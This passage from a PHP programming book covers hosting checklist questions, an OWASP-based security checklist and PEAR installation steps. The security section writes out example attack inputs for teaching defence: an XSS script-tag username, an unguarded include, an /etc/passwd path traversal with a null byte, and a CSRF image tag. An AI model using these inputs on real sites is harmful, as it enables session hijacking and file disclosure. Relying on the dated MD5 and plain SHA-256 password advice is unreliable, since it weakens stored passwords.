and programs from the command line?
MySQLDump is a very handy tool for backing up your database, but it’s no good if
you can’t run it on your server. Some hosts automatically kill any command line
application that executes for longer than a given time, so be sure to investigate this
issue.

Does the host provide you access to cron, the Unix
utility that allows you to schedule batch jobs?
If so, make sure the host allows command line scripts to be executed. Some hosts
have taken to implementing cron so that it executes scripts via a web URL, but this
is no use if the script in question uses the MySQLDump application to back up your
database—a PHP script executed via Apache will typically run as a user that
lacks the permissions required for the job.


PHP-related Issues
These considerations relate specifically to PHP and the way it’s set up on the server.

Can you see the output of phpinfo on the server you
will actually be assigned to?
Some hosts might claim this is a security risk, but expert hosts know that security
by obscurity is no substitute for real security. The information provided by phpinfo
is not a security risk to hosting providers that know what they’re doing, and have
Linux, Apache, and firewalls correctly set up. What phpinfo tells you is the best
way to confirm the facts.

Is PHP installed as an Apache module (not the CGI
variant)?
PHP installed as an Apache module provides much better performance than if PHP
is running in CGI mode.


      Is the Apache setting AllowOverride set to
      Options or All?
      This setting will let you modify php.ini settings with .htaccess files.

      Is PHP Safe Mode disabled?
      The safe_mode option in php.ini is, in theory, a way to make PHP secure, and prevent
      users from performing certain tasks or using certain functions that are security
      sensitive. Safe Mode is nothing but a large headache if you’re doing any serious
      work in PHP.

      Check the upgrade policy of your host.
      Ask the host how much warning you will get before upgrades are performed. Check
      that they’ll provide you with a copy of the php.ini file they’ll be using for the upgrade
      before it happens—the number of hosts that, overnight, switch from
      register_globals=on to register_globals=off is considerable. Make sure you test your
      applications on your development system against the new version before the host performs
      the upgrade.

      Ask for a list of installed PHP extensions.
      Confirm that these extensions match the requirements of your applications—few
      hosts, for example, bother to provide the XSLT extension. Confirm also that the
      host guarantees that all extensions will remain available between PHP upgrades.

      Will PHP be available for use from the command line?
      If not, you might alternatively require access to Perl or Python, or the ability to run
      shell scripts, if you’re happy with those languages. Usually, running a serious web
      site will require that you have the ability to run routine batch jobs (with cron) for
      tasks like backups, mailing yourself the PHP error log, and so on.

      What’s the host’s knowledge of PHP?
      Last but not least, throw in one or two questions that will test your hosting provider’s
      knowledge of PHP. Although it might not be the host’s job to write PHP code, when
      you find yourself in the position of knowing a lot more about PHP than your host,
the end result is depressing. It’s important to have a host that understands your
needs.
Appendix C: Security Checklist
Given that online PHP applications are exposed essentially to anyone and everyone,
security should be on, if not at the top of, your list of concerns as you develop your
applications. To some extent, the ease with which PHP applications can be developed
is also one of the language’s greatest weaknesses: for beginners who aren’t aware of
the possible dangers, it’s very easy to deploy an application for which the line of
security has as many holes as Swiss cheese.

Make sure you’re informed and, if in any doubt, prepared to ask questions. The
Open Web Application Security Project (OWASP) is a corporate-sponsored community
focused on raising the awareness of web security, and is an excellent source
of information on potential dangers.1 OWASP recently updated its list of the
top ten common security flaws in web applications, the relevant points of which
I’ve summarized here. The previous version from 2004 still contains relevant information
and, while there’s some duplication, it’s well worth a read.2

For a more detailed coverage of PHP security, you might like to read Essential PHP
Security by Chris Shiflett,3 and php|architect’s Guide to PHP Security by Ilia
Alshanetsky.4


Top Security Vulnerabilities
This list comprises the most common—and dangerous—security flaws found in
web applications today.

Cross-site Scripting (XSS)
Cross-site scripting attacks are the result of sending unchecked, user-supplied data
to a browser. The problem with user-supplied data is that it’s completely outside
of your control, and it’s easy to fake values like the HTTP referrer and the values
in a hidden form field.




1 http://www.owasp.org/
2 http://www.owasp.org/index.php/Top_10_2004
3 http://phpsecurity.org/
4 http://www.phparch.com/pgps/

      When dealing with forms, for example, validate the data carefully, and use a “deny
      all, permit a little” policy. For example, if a registration form has a field for the
      user’s username, allow only alphabetical characters and perhaps the numbers 0–9,
      rather than simply rejecting particular special characters. Use regular expressions
      to limit the data to exactly that which you require. Packages like
      PEAR::HTML_QuickForm, which we saw in “How do I build HTML forms with PHP?”
      in Chapter 5, provide built-in mechanisms for validating forms, and do a lot to help
      cover weaknesses you might otherwise neglect.
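
A “deny all, permit a little” check for the username field might look like the sketch below. The function name and the length limits of 3 to 20 characters are assumptions chosen for illustration; preg_match is standard PHP.

```php
<?php
// Accept only 3-20 ASCII letters and digits; everything else is rejected.
// The length limits are illustrative assumptions.
function is_valid_username($username)
{
    // \A and \z anchor the whole string, so a trailing newline cannot slip through.
    return is_string($username)
        && preg_match('/\A[A-Za-z0-9]{3,20}\z/', $username) === 1;
}
```

Because the pattern lists what is allowed rather than what is forbidden, a character you never thought of is rejected by default.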

      Without these checks, it might be possible for a malicious user to create an account
      with a username like this:

          John Doe<script type="text/javascript">…</script>



      This username includes a script that connects to another server and sends
      the current user’s session ID. Any person who then sees this username in the web
      browser (when browsing a forum, for example) will be sending his or her session
      ID to the remote server, allowing “John Doe” to connect to the web site as them.

      Of course, this tactic isn’t limited to user names; the same trick could be employed
      to exploit blog comment areas, the content of a forum post, or even the filename of
      an uploaded image. Less serious, but equally embarrassing, is when malicious users
      simply post HTML that “scrambles” the layout of your page, perhaps closing a table
      tag prematurely. Employ a separate markup language such as BBCode where possible,5
      and strip or escape HTML with PHP functions like strip_tags and
      htmlspecialchars (see Chapter 3 for more on this). If you really want to allow
      HTML to be posted to your application, consider building a filter based on
      PEAR::XML_HTMLSax.6
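
As a minimal sketch of escaping on output, the hypothetical helper below wraps htmlspecialchars so that the malicious username shown earlier is displayed as text rather than run as a script. The helper name and the UTF-8 charset are assumptions.

```php
<?php
// Escape a value for safe display inside HTML text or a quoted attribute.
// ENT_QUOTES converts both double and single quotes.
function escape_html($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

$username = 'John Doe<script type="text/javascript">alert(1)</script>';
echo '<p>Posted by ', escape_html($username), '</p>', "\n";
```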

      Also, where items like include files are concerned, watch out for logic like this:

          include($_GET['page']);



      Make sure you check the value of $_GET['page'] against a list of files you intend
      to include in your code:

      5 http://www.phpbb.com/community/faq.php?mode=bbcode
      6 http://pear.php.net/package/XML_HTMLSax/


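 // Whitelist of the only files this script may include
 $pages = array('news.php', 'downloads.php', 'links.php');
 // Treat a missing parameter as an unknown page
 $page = isset($_GET['page']) ? $_GET['page'] : '';
 if (in_array($page, $pages, true))
 {
   include $page;
 }
 else
 {
   include 'not_found.php';
 }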



Without such checks, it’s very easy for an attacker to use an unguarded include
to execute other PHP scripts—even if you didn’t write them, and they’re not stored on
your server.

Injection Flaws
Another example of the problems associated with the use of unchecked user-supplied
data values in a script, injection flaws allow an attacker to influence the way PHP
interacts with an external system, such as the file system or a database.

An SQL injection attack occurs when an attacker uses a form or URL to modify a
database query, and the topic was discussed in some detail in “How do I protect
my web site from an SQL injection attack?” in Chapter 2. The bottom line is: escape
all the data you receive from a user before you use it in a query.
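
One way to follow that advice with PDO (the subject of Chapter 2) is a prepared statement with a bound parameter. This is a sketch only: the users table, its columns, and the function name are hypothetical.

```php
<?php
// Look up a user by name with a bound parameter, so the value is never
// spliced into the SQL text. Table and column names are hypothetical.
function find_user_by_name(PDO $db, $name)
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute(array(':name' => $name));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The database driver handles the quoting, so a value such as alice' OR '1'='1 is compared as a literal string instead of changing the query.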

Malicious File Execution
Any script that allows the execution of a file that doesn’t reside on the server will
enable an attacker to execute arbitrary code on your server. The consequences of
such an attack could involve the undetected extraction of data from your application,
or a total compromise of your server.

Malicious file execution attacks are applicable to any system that takes filenames,
in part or in whole, or files from the user, and this issue ties in closely with that of
cross-site scripting attacks.

Insecure Direct Object Reference
You’ve seen URLs such as this before:


       http://site.com/view_order/?orderid=123



      Perhaps you’ve tried changing the value of orderid. This is one example of a direct
      object reference attack—most are easy to prevent, however. For example, to make
      sure that a user can only see his or her own orders on your site, you might use SQL
      like the following to confirm that the ordered items stored in the database have the
      same user_id as the current user’s user_id session value:

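       // ORDER is a reserved word in SQL, so the table is named orders here.
       // Both IDs are cast to integers so neither can alter the query.
       $sql = 'SELECT * FROM orders WHERE order_id=' .
           intval( $_GET['orderid'] ) . ' AND user_id=' .
           intval( $_SESSION['user']->get('user_id') );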



      Another form of direct object reference attack can be made by exploiting the way
      files are referenced within a script. Scripts that reference files on the basis of user-
      submitted data could be used to reveal information stored outside the web site’s
      document root. For example, take this innocuous-looking URL:

       http://site.com/welcome/?lang=en



      Behind the scenes, this URL tells a page to display in English by including the
      en.lang.php script:


       include( $_GET['lang'] . '.lang.php' );



      What do you imagine the following request would return from the above script?

       http://site.com/welcome/?lang=../../../../../../../etc/passwd%00



      The ../s will push the request to the root of the file system, and the %00 on the end
      of that URL uses the null termination trick, which will exploit the insecure include
      in the PHP script to include the /etc/passwd file—the list of all system users on
      the server. PHP strings may contain null bytes, but the underlying C file functions
      treat a null byte as the end of a string, so the '.lang.php' appended to the end
      is never seen.

      Remember—user-submitted information is not limited to the URL and form
      parameters! You should check to ensure that unchecked cookie values, and HTTP request
      header and content values, aren’t used in your script, either.
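
A safer version of the language include can be sketched by mapping the request value onto a fixed list, so the file name never comes from the user directly. The function name, the language codes, and the default are illustrative assumptions.

```php
<?php
// Map a requested language code to a file name from a fixed list.
// The language codes and the default are illustrative assumptions.
function language_file($requested, $default = 'en')
{
    $allowed = array('en', 'fr', 'de');
    $lang = in_array($requested, $allowed, true) ? $requested : $default;
    return $lang . '.lang.php';
}

$lang = isset($_GET['lang']) ? $_GET['lang'] : null;
$file = language_file($lang);
// include $file;  // the name can only be built from an entry in $allowed
```

Any value containing ../ or a null byte simply fails the list check and falls back to the default.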


Cross-site Request Forgery (CSRF)
This type of attack forces victims to perform actions on another site without their
consent. As an example, such an attack might include an image in a forum message
using this code:

 <img src="http://www.google.com/accounts/ClearSID" />



This code would automatically log out of Google all forum visitors who visit the
page on which this code appears. More devastatingly, a CSRF could result in your
account details being altered, or even bank transfers being initiated, without your
consent.

Protection against this type of attack is actually easier for the site that’s being attacked
than for the site that’s unknowingly hosting the attack. To protect against the automatic
submission of forms, you could create a random token that’s regenerated for
every form view, and placed in a session variable and a hidden field in the form:

 <?php $_SESSION['token'] = md5( uniqid( rand(), true ) ); ?>
 <form action="sensitive_action.php" method="post">
 <input type="hidden" name="token"
     value="<?php echo $_SESSION['token'] ?>"/>
 ⋮ …rest of the form
 </form>



When the form is submitted, a script checks that the token matches the value in the
session variable, which will only be the case if the form is loaded from the real
site—the page fails if the request comes from elsewhere.
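
The check performed when the form is submitted might be sketched as below. Both function names are hypothetical, and the sketch swaps in random_bytes (PHP 7 or later) and hash_equals (PHP 5.6 or later) in place of the md5/uniqid approach shown in the form, on the assumption that a newer PHP version is available.

```php
<?php
// Create an unpredictable token (random_bytes requires PHP 7 or later).
function new_csrf_token()
{
    return bin2hex(random_bytes(32));
}

// Compare the stored and submitted tokens in constant time
// (hash_equals requires PHP 5.6 or later). Missing or empty tokens fail.
function csrf_token_is_valid($sessionToken, $submittedToken)
{
    return is_string($sessionToken)
        && is_string($submittedToken)
        && $sessionToken !== ''
        && hash_equals($sessionToken, $submittedToken);
}
```

In the receiving script you would pass the session value and the posted value to csrf_token_is_valid, and refuse to carry out the action when it returns false.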

Another option—especially for high-risk operations such as bank transfers and
password changes—is to require the user to confirm changes. This way, a forged
request will cause the real user to be prompted to confirm the action before it goes
ahead.

Information Leakage and Improper Error Handling
When errors occur in scripts, information that can be useful to attackers might be
leaked in error messages. Take, for example, a message such as this:


          Warning: mysql_connect(): Access denied for user

          ➥ 'sitepoint'@'db.sitepoint.com' (using password: YES)
          ➥ in /var/www/index.php on line 12


      This information gives a potential attacker the database user name, the database
      server’s host name, and the location of the script on the server.

      Similarly, error messages that output erroneous SQL statements give attackers a
      small view into your database structure—possibly their first step towards SQL
      injections.

      Refer to the section called “Key Security and Portability Settings” in Appendix A
      for information on disabling error output to the browser in production environments,
      and opting for error messages to be logged to a file instead.
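
Where you can’t edit php.ini, the same settings can be applied at the top of a script. This is a minimal sketch; the log file location is a hypothetical path, and on a real site it should sit outside the document root.

```php
<?php
// Production-style error handling: hide errors from visitors, log them instead.
// The log file location is a hypothetical path chosen for this sketch.
$logFile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'php_errors.log';

ini_set('display_errors', '0');  // nothing is sent to the browser
ini_set('log_errors', '1');      // errors are written to the log
ini_set('error_log', $logFile);  // the file that receives them
error_reporting(E_ALL);          // still record every error level
```

Errors that occur before these lines run, such as parse errors in the same file, are not covered, which is one reason to prefer php.ini or .htaccess where the host allows it.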

      Broken Authentication and Session Management
      Broken authentication and session management vulnerabilities are closely tied to
      the inadequate protection of account and session data. We’ve already seen how
      sessions can be hijacked using cross-site scripting, and if the session is hijacked
      before a user logs in, the attacker simply needs to wait until the user logs in to gain
      full access to that person’s account.

      PHP offers the session_regenerate_id function,7 which should be used before
      any change in privilege level. Essentially, it maintains the session data, while
      changing the session ID. So after a user logs in, that person obtains a new session
      ID, and any previous sessions hijacked by the attacker are useless. You should also
      stick with PHP’s own session and cookie management functions—don’t write your
      own or use third-party scripts.

      Other measures you can take to prevent this type of vulnerability include ensuring
      that your site’s logout functionality completely destroys the session data, and
      automatically logging users out after a period of inactivity.

      It’s also advisable not to send passwords in plain text, either in emails or
      displayed on screen. If you must email a password, ensure the user has to change that
      password upon the next login before he or she can continue to use the site.


      7 http://www.php.net/session-regenerate-id/


Insecure Cryptographic Storage
First of all, when it comes to cryptography, don’t roll your own code. Second, remember
that if you’re encrypting data using an algorithm that’s meant to be decoded,
then someone else will also be capable of decoding it.

Remember that, strictly speaking, MD5 and SHA are not encryption algorithms (that
is, you can’t decrypt an MD5 string to obtain the original data); they are message
digest algorithms. But if you don’t need to decrypt a value, use SHA-256, which is
available through the hash8 function as of PHP 5.1.2 (usage: hash('sha256', $password);).
If this is not an option, you can opt for the less secure MD5 hash, which is available
through the md59 function.

This technique allows you to compare the hashed versions of two pieces of data
(e.g. a stored password and that entered by a user), which avoids the risks involved
in working with encrypted values that could possibly be decrypted by an attacker.
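
For passwords specifically, later PHP versions offer a dedicated API. The sketch below swaps in password_hash and password_verify (PHP 5.5 or later) rather than the hash('sha256', …) call mentioned above, because they add a random salt and use a deliberately slow algorithm. The wrapper function names are hypothetical.

```php
<?php
// Hash a new password with PHP's built-in API (PHP 5.5 or later);
// a random salt is generated and stored inside the returned string.
function hash_password($password)
{
    return password_hash($password, PASSWORD_DEFAULT);
}

// Check a login attempt against the stored hash.
function check_password($password, $storedHash)
{
    return password_verify($password, $storedHash);
}
```

Only the hash is stored; at login, the submitted password is checked against it and the original password is never recoverable from the database.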

Insecure Communications
Sending any type of sensitive information in plain text isn’t just bad practice, it’s
inexcusable. For example, if you’re asking a user to log in or provide credit card
details, you should be securing the communications using SSL. If your application
causes your server to talk to another server, for example a bank’s merchant services
system, that communication should also be secured using SSL.

Failure to Restrict URL Access
Most applications will limit the links available to users on the basis of their privilege
levels. For example, all users see a link to the homepage, but only administrators
have access to the link to the list of users. However, many applications’ user authorization
systems stop at that point, which means that anyone who types in the full
URL to the user list page will gain access.

Make sure that your users only see the links they can use, but also make sure that
each page checks users’ privileges before allowing them to continue.
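
A per-page check could be sketched as follows. The role name, the page names, and the function itself are hypothetical; the point is only that the decision is made on the server for every request, not by hiding links.

```php
<?php
// Return true if the user's role may open the given page.
// The role names and page list are hypothetical.
function can_access($role, $page)
{
    $adminOnly = array('user_list.php', 'settings.php');
    if (in_array($page, $adminOnly, true)) {
        return $role === 'admin';
    }
    return true;
}
```

Each restricted page would call can_access at the top and stop with an error response when it returns false, before any output is produced.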




8 http://www.php.net/hash/
9 http://www.php.net/md5/

      More information on this topic is available at PHP Advisory,10 although, sadly, the
      site is no longer being maintained.




      10 http://www.phpadvisory.com/
Appendix D: Working with PEAR

PEAR,1 the PHP Extension and Application Repository, is the brainchild of Stig
Bakken, and was inspired by Perl’s CPAN.2

As a project, it was originally conceived in 1999 and reached its first stable release
in January 2003. PEAR serves two purposes. First, it provides a library of PHP classes
for solving common architectural problems, a number of which you’ve seen in this
book. Second, under the title PECL (PHP Extension Code Library), PEAR provides
a repository for extensions to PHP. PECL was originally intended to store nonstandard
extensions that lay more on the fringes of PHP, but it has since evolved into the
default repository for all the extensions that aren’t included in the core PHP distribution.
Here, I’ll be concentrating on the PHP classes that PEAR provides.

Those who submit work and maintain the PEAR repository are all volunteers. Originally
a small community of developers, the number of volunteers has grown
significantly since the release of the first stable version of PEAR, and the group receives
a greater focus from the PHP community as a whole. There’s still a lot of
work to be done to raise the standards of PECL to that of PHP itself, documentation
being a key area in which there’s still much room for improvement. If you’re struggling
with a PEAR package, a good place to start is PHPKitchen’s list of PEAR Tutorials.3
That said, PEAR already offers significant value in terms of reducing the
effort required in developing PHP applications.

But what does PEAR actually mean to you? Browse the list of packages,4 and you’ll
see that PEAR provides many more classes, categorized by subject, to help you avoid
having to reinvent wheels. It’s important to understand that the focus of PEAR
classes is architectural issues, not application-level classes. In other words, you
won’t find complete applications there; rather, you’ll find code that can be reused
in many different applications. Also important is that the PEAR developer community
does its best to maintain and support the library, which compares favorably with,
say, the projects available via SourceForge,5 which are often individual endeavours
and come to a sudden end once the individuals in question stop contributing their
time. Beyond that, there is some emphasis on maintaining a degree of standardization
throughout the PEAR library. For example, all error handling should be performed
using PEAR::Error, and the code should be documented using the PHPDoc standard,
which means that if you can’t find the API documentation on the PEAR web site, you
should be able to extract it using phpDocumentor,6 which we covered in some detail
in “How can I document my code for later reference by myself or others?” in
Chapter 13.

1 http://pear.php.net/
2 http://www.cpan.org/
3 http://www.phpkitchen.com/index.php?/archives/668-PEAR-Tutorials.html
4 http://pear.php.net/packages.php
5 http://sourceforge.net/

      Be warned: the degree of integration between the packages within PEAR is currently
      fairly low when compared to, say, the Java class library. This means that, in some
      cases, you’ll be confronted with decisions such as whether to use
      PEAR::HTML_QuickForm’s validation functionality, or PEAR::Validate, or both. It’s
      a good idea to invest some time investigating which option fits your development
      style up-front, rather than jumping straight in and using a PEAR class for a critical
      part of your application, only to discover later that it wasn’t the best solution to the
      problem.

      One important point to be clear on is that a reference to PEAR can actually mean
      one of two things: the repository as a whole, or the PEAR front end (also known as
      the package manager), which provides tools for installing and upgrading the PEAR
      packages you use.

      You’re not required to use the PEAR package manager to install PEAR packages. If
      you need to, you can download them directly from the PEAR web site and manually
      extract them to your PHP’s include path. Make sure you check the dependencies
      listed on the site (these are other required packages) and be aware that most packages
      implicitly require the PEAR base package for tasks like error handling.7


      Installing PEAR
      These days, the foundations of PEAR are provided with the PHP distribution itself,
      but web hosts typically fail to provide customers with their own default PEAR
      installations, so it’s worth knowing how to go about installing PEAR from scratch.
      The process can differ slightly between Unix- and Windows-based systems.


      6 http://www.phpdoc.org/
      7 http://pear.php.net/package/PEAR/

Step one is to make sure you can run PHP scripts via the command line. This is always
possible if you type the full path to the PHP binary. For a Unix-based system,
you’d use the following:

    /usr/local/bin/php /home/username/scripts/my_script.php



For Windows, you’d use something like this:

    c:\php\cli\php.exe c:\scripts\my_script.php



Note that in the Windows path above, we used the executable in the c:\php\cli
(command line interface) subdirectory of the PHP installation. This executable
behaves slightly differently from that used by Apache to handle web pages. PHP binary
releases for Windows since version 4.3.0 place the CLI version of the PHP executable
in this directory. We can make PHP much easier to use from the command line by
applying some changes to the system’s environment variables. For more information,
see the PHP CLI manual pages.8
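
If you’re ever unsure which executable is running a script, the built-in PHP_SAPI constant reports the interface in use. The following is a minimal sketch; the helper name `runningOnCommandLine` is an assumption made for this example.

```php
<?php
// PHP_SAPI names the interface PHP is running under: "cli" on the
// command line, or a server-specific name when run by a web server.
function runningOnCommandLine($sapi = PHP_SAPI)
{
    return $sapi === 'cli';
}

if (runningOnCommandLine()) {
    echo "Running from the command line\n";
} else {
    echo "Running under the ", PHP_SAPI, " server interface\n";
}
```

Saving this as a script and running it with the full path to the CLI binary, as shown earlier, is a quick way to confirm that the command line setup works.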

Next, point your browser at http://go-pear.org/, where you’ll see a PHP script. This
script is used to install the PEAR package manager, which is the basis you’ll need
in order to install other PEAR packages. Download this to your computer and save it
as go-pear.php. From this point, you have a number of options.

Storing go-pear.php somewhere under your web server’s document root directory
will allow you to run the script as a web page. This behavior is still experimental,
though, so there are no guarantees it’ll work correctly. If you do use this approach,
make sure that the script is not publicly available!

A better option is to execute the go-pear.php script via the command line:

    /usr/local/bin/php /home/username/pear/go-pear.php



Here’s the command for Windows users:

    c:\php\cli\php c:\pear\go-pear.php





8 http://www.php.net/features.commandline/

      This command will launch an interactive command line interface, which will ask
      you questions about how you would like PEAR installed. Note that the installation
      prefix is the directory in which PEAR (as well as any packages you install later)
      will be installed, and is referred to as $prefix; $php_dir contains the path to your
      PHP installation (in which go-pear.php will put PEAR-related documentation by
      default, unless you specify otherwise). Windows users should be aware that changing
      the installation prefix will cause a Windows Browse dialog to display; you can use
      it to specify the directory you require.

      With the installation options set to your requirements, the go-pear.php script will
      connect to the PEAR web site and download all the packages required to set up the
      package manager (it also asks if you require additional packages, which are well
      worth having). Packages are installed in a subdirectory, called pear, that’s within
      the directory you specified as the installation prefix. So, in the above examples,
      you’d end up with c:\pear\pear or /home/username/pear/pear.

      Next, if you let it, the go-pear.php installer will attempt to modify your
      include_path in php.ini. To do this manually, assuming you used the directories
      above, you’d specify the following:

       include_path = ".:/home/username/pear/pear"



      For Windows users, the path is as follows:

       include_path = ".;c:\pear\pear"
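
If you can’t edit php.ini (on shared hosting, for example), the include path can also be extended at runtime. The sketch below is one possible approach, not the installer’s own method: the helper `appendIncludePath` is a hypothetical name, and the directory is the Unix example path used above.

```php
<?php
// Assumed location: the pear subdirectory from the Unix example above.
$pearDir = '/home/username/pear/pear';

// Hypothetical helper: appends $dir to an include path string unless it
// is already listed. PATH_SEPARATOR is ":" on Unix-based systems and
// ";" on Windows, so the same code serves both.
function appendIncludePath($dir, $current)
{
    $parts = explode(PATH_SEPARATOR, $current);
    if (in_array($dir, $parts, true)) {
        return $current; // already present, leave the path unchanged
    }
    return $current . PATH_SEPARATOR . $dir;
}

set_include_path(appendIncludePath($pearDir, get_include_path()));
echo get_include_path(), "\n";
```

Run this before the first require_once that refers to a PEAR file; the change lasts only for the current script.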



      To use the PEAR package manager from the command line, you’ll also need to
      set up some environment variables. Windows users can automatically add these
      variables to their Windows registries by right-clicking on the file PEAR_ENV.reg and
      choosing Run from the menu that appears. The variables may also be manually
      configured as environment variables via the Windows Control Panel. Users of
      Unix-based systems can configure the variables to be set up every time they log in.
      To do so, they must edit the file .profile in the home directory (/home/username):

       # Environment variables
       export PHP_PEAR_SYSCONF_DIR=/home/username/pear
       export PHP_PEAR_INSTALL_DIR=/home/username/pear/pear
       export PHP_PEAR_DOC_DIR=/home/username/pear/pear/docs
       export PHP_PEAR_BIN_DIR=/home/username/pear
       export PHP_PEAR_DATA_DIR=/home/username/pear/pear/data
       export PHP_PEAR_TEST_DIR=/home/username/pear/pear/tests
       export PHP_PEAR_PHP_BIN=/usr/local/bin/php



Finally, you’ll need to add the PEAR command line script to your system path,
which, on Windows, can be achieved through the System Control Panel application
(on the Advanced tab, click Environment Variables). Simply append ;c:\pear to the
PATH variable.

On Unix-based systems, add the following to the .profile script:

 export PATH=$PATH:/home/username/pear
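
After logging in again, you may want to confirm that the variables from .profile are actually visible to PHP. The following sketch does this from the command line; the helper name `missingVariables` is an assumption made for this example, and the variable names are the ones used in the .profile listing.

```php
<?php
// Variable names taken from the .profile example; adjust to your setup.
$expected = array(
    'PHP_PEAR_SYSCONF_DIR',
    'PHP_PEAR_INSTALL_DIR',
    'PHP_PEAR_DOC_DIR',
    'PHP_PEAR_BIN_DIR',
    'PHP_PEAR_DATA_DIR',
    'PHP_PEAR_TEST_DIR',
    'PHP_PEAR_PHP_BIN',
);

// Hypothetical helper: returns the names that are absent or empty in
// the given name => value map.
function missingVariables(array $names, array $environment)
{
    $missing = array();
    foreach ($names as $name) {
        if (!isset($environment[$name]) || $environment[$name] === '') {
            $missing[] = $name;
        }
    }
    return $missing;
}

// Collect the current values; getenv() returns false for unset names.
$environment = array();
foreach ($expected as $name) {
    $value = getenv($name);
    if ($value !== false) {
        $environment[$name] = $value;
    }
}

$missing = missingVariables($expected, $environment);
if ($missing) {
    echo 'Not set: ', implode(', ', $missing), "\n";
} else {
    echo "All PEAR variables are set\n";
}
```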



Once you’ve done all that, you’re ready to move on and use the package manager.


The PEAR Package Manager
Assuming you’ve set up PEAR correctly, you can now use the command line interface
to the PEAR package manager to install packages. For example, take this command:

 pear install HTML_Common



This line will install the package HTML_Common from the PEAR web site. The package
names for the command line are the same as those on the web site.

The PEAR Package Manager uses XML_RPC to communicate with the PEAR web
site. If you’re behind a proxy server or firewall, you’ll need to tell PEAR the domain
name of the proxy server like so:

 pear config-set http_proxy proxy.your-isp.com



To unset the variable at some later stage, simply use this command:


       pear config-set http_proxy ""



      To add HTML_QuickForm to the installed PEAR packages, you simply need to type
      the following:

       pear install HTML_QuickForm



      Should another release of HTML_QuickForm be made after you’ve installed it, you
      can upgrade the version with this command:

       pear upgrade HTML_QuickForm



      If, for some reason, you later decide you don’t need HTML_QuickForm any more, you
      can remove it using this line:

       pear uninstall HTML_QuickForm



      For a list of all the PEAR commands, simply type pear.

      Now, if you don’t like command lines, there’s also an (experimental) web-based
      front end to PEAR (there’s also a PHP-GTK front end, but it’s beyond the scope of
      this discussion). To use this tool, you need to install it from the command line,
      although if you executed go-pear.php through your web server, the web-based front
      end will already have been installed for you. To install the front end, type the
      following commands:

       pear install Net_UserAgent_Detect
       pear install Pager
       pear install HTML_Template_IT
       pear install PEAR_Frontend_Web



      Note that the first three packages we’ve specified here are required by
      PEAR_Frontend_Web. Now you can launch the front end from your web server using
      the following simple script:


    <?php
    // Optional if include path not set
    # ini_set('include_path', 'c:\htdocs\PEAR');

    require_once 'PEAR.php';

    // For Windows users
    # $pear_user_config = 'c:\windows\pear.ini';

    // For Unix users
    $pear_user_config = '/home/username/pear/pear/PEAR/pear.conf';

    $useDHTML = true; // Switch off for older browsers

    require_once 'PEAR/WebInstaller.php';
    ?>




Installing Packages Manually
It’s possible to install PEAR packages manually (although this involves more work),
but it’s important to watch the include paths carefully when you’re doing so. First
of all, create a directory that will be the base of all the PEAR classes you install,
making sure that this directory is in your include path. Next, install the main PEAR
package.9 Download the latest stable version and extract it directly to the directory
you’ve created, so that PEAR.php is in the root of this directory.

9 http://pear.php.net/package/PEAR/

Installing further packages can be completed in more or less the same fashion, but
you need to be careful to choose the correct directories when you’re extracting the
various files. For example, if you’re installing PEAR::DB, the main DB.php file goes
alongside the PEAR.php file in the root of the PEAR class directory, while further
PEAR::DB-related files belong in the subdirectory DB. The best way to check that
you’ve selected the appropriate directories is to look at the package.xml file that
comes with every PEAR package. There you’ll find an element called filelist,
which lists all the files contained in the package and the locations at which they
should be installed. For each file, check the baseinstalldir attribute: if it’s
specified, it will tell you where the file should be placed relative to the root
PEAR class directory. The name attribute specifies the path and filename, relative
to the baseinstalldir (or just the root PEAR class directory if there’s no
baseinstalldir attribute), where each file should be placed.
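
The lookup described above can be sketched with SimpleXML. The XML below is a simplified, made-up fragment that contains only the filelist, file, baseinstalldir, and name parts mentioned in the text; a real package.xml file holds many more elements and may nest them differently, so treat this as an illustration rather than a parser for real packages. The function name `installPaths` is likewise an assumption.

```php
<?php
// Simplified, hypothetical package.xml fragment (not a real package).
$xml = <<<XML
<package>
  <filelist>
    <file role="php" baseinstalldir="/" name="DB.php"/>
    <file role="php" baseinstalldir="/" name="DB/common.php"/>
    <file role="php" baseinstalldir="HTML" name="Common.php"/>
  </filelist>
</package>
XML;

// Hypothetical helper: works out where each listed file belongs,
// relative to the root PEAR class directory given in $pearRoot.
function installPaths($xml, $pearRoot)
{
    $package = simplexml_load_string($xml);
    $paths = array();
    foreach ($package->xpath('//filelist//file') as $file) {
        // A missing attribute casts to an empty string.
        $base = trim((string) $file['baseinstalldir'], '/');
        $name = ltrim((string) $file['name'], '/');
        $relative = ($base === '') ? $name : $base . '/' . $name;
        $paths[] = rtrim($pearRoot, '/') . '/' . $relative;
    }
    return $paths;
}

foreach (installPaths($xml, '/home/username/pear/pear') as $path) {
    echo $path, "\n";
}
```

Comparing this list with the files you have extracted is a quick way to spot any that landed in the wrong directory.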


      Alternatives to PEAR
      Many repositories of reusable PHP classes are available. Some web sites, such as
      PHP Classes,10 offer user-contributed work for download, while others, such as eZ
      Components,11 manage their own code base of reusable classes that can be
      downloaded as a package.

      For more tightly integrated repositories of code, you might like to investigate the
      numerous rapid application development frameworks available, such as the Zend
      Framework12 and CakePHP.13

      It’s not within the scope of this book to cover any of these frameworks in depth, or
      comment on which will best suit your needs, but on the whole, reusing code from
      any of these sources, including PEAR, can save you development time and allow
      you to concentrate on writing software that solves your needs, rather than rewriting
      basic components for every project.

      Note, however, that some overhead is involved when you’re starting out with code
      from repositories and frameworks. Writing all your code from scratch might be the
      fastest solution in the short term, but selecting and becoming fluent with one
      repository or framework will help decrease your development time in the medium term,
      and will benefit anyone who writes more than one web site. You’ll also find that
      selecting the right framework will make it easier for other developers to come up
      to speed when they’re working on the sites you create. Also, avoid switching
      development environments frequently, as this will reset your learning curve and might
      adversely affect your productivity.

      Finally, remember that when you use code from any repository that accepts public
      contributions with little or no requirement for quality control, you might be opening
      yourself up to all sorts of problems, from security vulnerabilities to reliance on stale
      and unmaintained components.


      10 http://www.phpclasses.org/
      11 http://ez.no/ezcomponents/
      12 http://framework.zend.com/
      13 http://www.cakephp.org/
Index
                                           aggregation

Symbols                                       about, 23

$_SESSION, 278, 281
                       agile documentation

$this variable, 15, 32
                       about, 459

.forward file, 191
                        allow_url_fopen, 477

.htaccess file, 473
                       anti-spam (see spam legislation)

.ini files
                                Apache web server

   storing configuration information, 164
    caching, 367

                                              hosting support, 483

A                                             HTTP authentication, 271

abstract classes
                             PHP installation, 485

   about, 27
                              APIs

abstract methods
                             about, 13

   about, 28
                                 callback arguments, 353

AcceptPathInfo
